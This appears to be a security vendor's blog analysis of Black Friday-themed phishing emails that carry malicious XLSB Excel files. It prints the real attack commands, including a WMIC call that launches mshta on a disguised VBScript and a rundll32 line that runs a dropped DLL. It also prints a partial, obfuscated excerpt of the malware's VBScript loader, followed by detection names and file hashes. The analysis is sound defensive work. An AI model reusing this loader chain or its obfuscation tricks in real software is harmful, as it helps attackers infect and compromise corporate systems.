Distribution of Malicious Excel Files Targeting Companies Amid Black Friday Season

Malicious Excel files are being distributed to companies amid the Black Friday season. The email confirmed today (Nov 25th) is an email received from the attacked company. Attached to the email is an Excel file that contains an Excel 4.0 Macro (XLM) macro sheet in the form of the XLSB excel binary. It checks whether the system is a domain controller then activates additional malicious features.

The filename of the attached Excel file is ‘promo details-[number].xlsb,’ and its file format is XLSB. XLSB is the Excel Binary File Format that has a different file structure from that of XLS and XLSX files. Unlike XLSX which is a string-based XML file format (see figure below), XLSB consists of Hex binary, making it harder for analysts or anti-malware software with targeted file scan feature to decrypt its codes. This is not the first time the malicious XLSB file has been discovered. As distributed files mostly took the form of XLS or XLSX file format, this calls for increased attention to the future trend.

XLSB 파일 포맷Binary file that consists macro sheet in XLSB file
XML file that consists macro sheet in XLSX file

Upon running the Excel file, the following is shown, and clicking the image after enabling macro activates integrated malicious features. It appears that this design is to avoid detection measures such as an automatic analysis system. Furthermore, the attacker added ‘protection’ to the Excel file to complicate the file analysis. Given that the macro sheet can only be viewed after entering the valid password, it would be safe to say that the development process of malware has become even more sophisticated.

When the user clicks the image, the file creates a malicious file in the ProgramData directory and runs it via WMIC. The malicious file is a VBScript file under the disguise of an RTF file.

Command line: wmic process call create “mshta C:\ProgramData\cbfyx.rtf”

The executed VBScript contains the following code (partial). The main features of the VBScript are as follows:

  • Checks %USERDOMAIN% and %LOGONSERVER% info of the user’s system – To check whether it’s domain controller
  • If it is domain controller, connects to https://cdn.discordapp.com to check whether network connection is available
  • If it is not domain controller, doesn’t run the rest of the features
  • Creates malicious DLL file in ProgramData directory
  • Runs malicious DLL file with Rundll32.exe process C:\ProgramData\nianigger.bin DllRegisterServer
<script type="text/vbscript" LANGUAGE="VBScript" >
G_Q_w_i_Y_t_S_V_Y_W_n_K_s_i_F = "ru" & "" & <strong>Chr</strong>(110+1-1) & "dll" & "32." & "ex" & <strong>Chr</strong>(101+1-1) & <strong>Chr</strong>(32+1-1) & <strong>Chr</strong>(67+1-1) & ":\\" & <strong>Chr</strong>(80+1-1) & "ro" & <strong>Chr</strong>(103+1-1) & "ra" & "mDa" & "" & "ta\" & Chr(110+1-1) & "ian" & Chr(105+1-1) & "gge" & Chr(114+1-1) & ".bi" & "n D" & Chr(108+1-1) & "lR" & "egi" & "ste" & "rS" & "er" & "ve" & "" & <strong>Chr</strong>(114+1-1)
Set Q_o_b_k_v_e_J_u_V_s = <strong>CreateObject</strong>("" & "MSX" & "" & <strong>Chr</strong>(77+1-1) & "L2." & "" & "Se" & "rve" & "rXM" & <strong>Chr</strong>(76+1-1) & "HT" & "TP." & "" & "" & "" & <strong>Chr</strong>(54+1-1) & <strong>Chr</strong>(46+1-1) & <strong>Chr</strong>(48+1-1))

H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k = <strong>Chr</strong>(87+1-1) & “” & “scr” & <strong>Chr</strong>(105+1-1) & “” & “” & “” & “pt.” & “Sh” & <strong>Chr</strong>(101+1-1) & “” & <strong>Chr</strong>(108+1-1) & “” & <strong>Chr</strong>(108+1-1)
Set W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z = <strong>CreateObject</strong>(H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k)
w_g_x_q_b_O_S_y_G_g_w_c = <strong>LCase</strong>(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.<strong>expandenvironmentstrings</strong>("%USERDOMAIN%"))
e_K_l_a_I_l_c_E_t =<strong>LCase</strong>(<strong>Replace</strong>(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.<strong>expandenvironmentstrings</strong>("%LOGONSERVER%"), CHR(92+1-1+1-1), “”))
Set q_h_H_U_O_o_S_q = <strong>CreateObject</strong>("" & “” & <strong>Chr</strong>(83+1-1) & “” & “cri” & “pt” & “ing” & <strong>Chr</strong>(46+1-1) & “” & <strong>Chr</strong>(70+1-1) & “ile” & <strong>Chr</strong>(83+1-1) & <strong>Chr</strong>(121+1-1) & “” & “ste” & “mOb” & “” & “je” & <strong>Chr</strong>(99+1-1) & <strong>Chr</strong>(116+1-1))

</script>

To summarize, the email and the malicious Excel file found this time is malware that targeted a company. It is estimated that there may be more of these similar attacks even after the Black Friday season ends.

[File Detection]
Downloader/XLS.Generic

[Behavior Detection]
Execution/MDP.Behavior.M3819

[IOC]
9f27881dd96c57de0495bf609b954af5
33411e3b8028fe4b8f9786b440d0b098
f2c941b14d81c9b6b7a7aa6b98f91ce9
e73d286a4915a3f62516a701f5ae9467

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Distribution of Malicious Excel Files Targeting Companies Amid Black Friday Season appeared first on ASEC BLOG.

Article Link: Distribution of Malicious Excel Files Targeting Companies Amid Black Friday Season - ASEC BLOG